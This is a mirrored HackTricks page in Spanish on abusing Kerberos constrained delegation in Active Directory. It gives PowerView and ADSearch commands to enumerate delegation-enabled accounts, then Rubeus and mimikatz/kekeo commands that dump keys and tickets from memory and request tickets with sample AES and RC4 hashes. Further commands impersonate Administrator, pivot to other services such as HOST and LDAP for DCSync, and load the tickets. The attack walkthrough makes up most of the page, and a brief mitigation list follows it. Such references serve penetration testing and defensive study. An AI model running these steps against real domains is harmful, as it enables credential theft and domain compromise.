Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-12-14 07:13:01 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/windows-hardening/active-directory-methodology/constrained-delegation.md

7.9 KiB
Raw Blame History

Delegación Restringida

Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks:

Delegación Restringida

Utilizando esto, un administrador de dominio puede permitir a un ordenador impersonar a un usuario o computadora contra un servicio de una máquina.

  • Servicio para Usuario a sí mismo (S4U2self): Si una cuenta de servicio tiene un valor de userAccountControl que contiene TRUSTED_TO_AUTH_FOR_DELEGATION (T2A4D), entonces puede obtener un TGS para sí mismo (el servicio) en nombre de cualquier otro usuario.
  • Servicio para Usuario a Proxy(S4U2proxy): Una cuenta de servicio podría obtener un TGS en nombre de cualquier usuario para el servicio establecido en msDS-AllowedToDelegateTo. Para hacerlo, primero necesita un TGS de ese usuario para sí mismo, pero puede usar S4U2self para obtener ese TGS antes de solicitar el otro.

Nota: Si un usuario está marcado como 'La cuenta es sensible y no se puede delegar' en AD, no podrás impersonar a ese usuario.

Esto significa que si comprometes el hash del servicio puedes impersonar usuarios y obtener acceso en su nombre al servicio configurado (posible escalada de privilegios).

Además, no solo tendrás acceso al servicio que el usuario puede impersonar, sino también a cualquier servicio porque el SPN (el nombre del servicio solicitado) no se está verificando, solo los privilegios. Por lo tanto, si tienes acceso al servicio CIFS también puedes tener acceso al servicio HOST usando la bandera /altservice en Rubeus.

Asimismo, el acceso al servicio LDAP en DC, es lo que se necesita para explotar un DCSync.

{% code title="Enumerar" %}

# Powerview
Get-DomainUser -TrustedToAuth | select userprincipalname, name, msds-allowedtodelegateto
Get-DomainComputer -TrustedToAuth | select userprincipalname, name, msds-allowedtodelegateto

#ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes cn,dnshostname,samaccountname,msds-allowedtodelegateto --json

{% endcode %}

{% code title="Obtener TGT" %}

# The first step is to get a TGT of the service that can impersonate others
## If you are SYSTEM in the server, you might take it from memory
.\Rubeus.exe triage
.\Rubeus.exe dump /luid:0x3e4 /service:krbtgt /nowrap

# If you are SYSTEM, you might get the AES key or the RC4 hash from memory and request one
## Get AES/RC4 with mimikatz
mimikatz sekurlsa::ekeys

## Request with aes
tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /aes256:babf31e0d787aac5c9cc0ef38c51bab5a2d2ece608181fb5f1d492ea55f61f05
.\Rubeus.exe asktgt /user:dcorp-adminsrv$ /aes256:babf31e0d787aac5c9cc0ef38c51bab5a2d2ece608181fb5f1d492ea55f61f05 /opsec /nowrap

# Request with RC4
tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /rc4:8c6264140d5ae7d03f7f2a53088a291d
.\Rubeus.exe asktgt /user:dcorp-adminsrv$ /rc4:cc098f204c5887eaa8253e7c2749156f /outfile:TGT_websvc.kirbi

{% endcode %}

{% hint style="warning" %} Existen otras formas de obtener un ticket TGT o las claves RC4 o AES256 sin ser SYSTEM en el ordenador, como el Printer Bug y la delegación sin restricciones, retransmisión NTLM y abuso del Servicio de Certificados de Active Directory.

Simplemente teniendo ese ticket TGT (o su hash) puedes realizar este ataque sin comprometer todo el ordenador. {% endhint %}

{% code title="Usando Rubeus" %}

#Obtain a TGS of the Administrator user to self
.\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /impersonateuser:Administrator /outfile:TGS_administrator

#Obtain service TGS impersonating Administrator (CIFS)
.\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /tgs:TGS_administrator_Administrator@DOLLARCORP.MONEYCORP.LOCAL_to_websvc@DOLLARCORP.MONEYCORP.LOCAL /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /outfile:TGS_administrator_CIFS

#Impersonate Administrator on different service (HOST)
.\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /tgs:TGS_administrator_Administrator@DOLLARCORP.MONEYCORP.LOCAL_to_websvc@DOLLARCORP.MONEYCORP.LOCAL /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /altservice:HOST /outfile:TGS_administrator_HOST

# Get S4U TGS + Service impersonated ticket in 1 cmd (instead of 2)
.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /user:dcorp-adminsrv$ /ticket:TGT_websvc.kirbi /nowrap

#Load ticket in memory
.\Rubeus.exe ptt /ticket:TGS_administrator_CIFS_HOST-dcorp-mssql.dollarcorp.moneycorp.local

{% endcode %}

{% code title="kekeo + Mimikatz" %}

#Obtain a TGT for the Constained allowed user
tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /rc4:8c6264140d5ae7d03f7f2a53088a291d

#Get a TGS for the service you are allowed (in this case time) and for other one (in this case LDAP)
tgs::s4u /tgt:TGT_dcorpadminsrv$@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLAR CORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:time/dcorp-dc.dollarcorp.moneycorp.LOCAL|ldap/dcorpdc.dollarcorp.moneycorp.LOCAL

#Load the TGS in memory
Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_ldap~ dcorp-dc.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL_ALT.kirbi"'

{% endcode %}

Mitigación

  • Deshabilitar la delegación de kerberos donde sea posible
  • Limitar los inicios de sesión de DA/Admin a servicios específicos
  • Establecer "La cuenta es sensible y no se puede delegar" para cuentas privilegiadas.

Más información en ired.team.

Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks: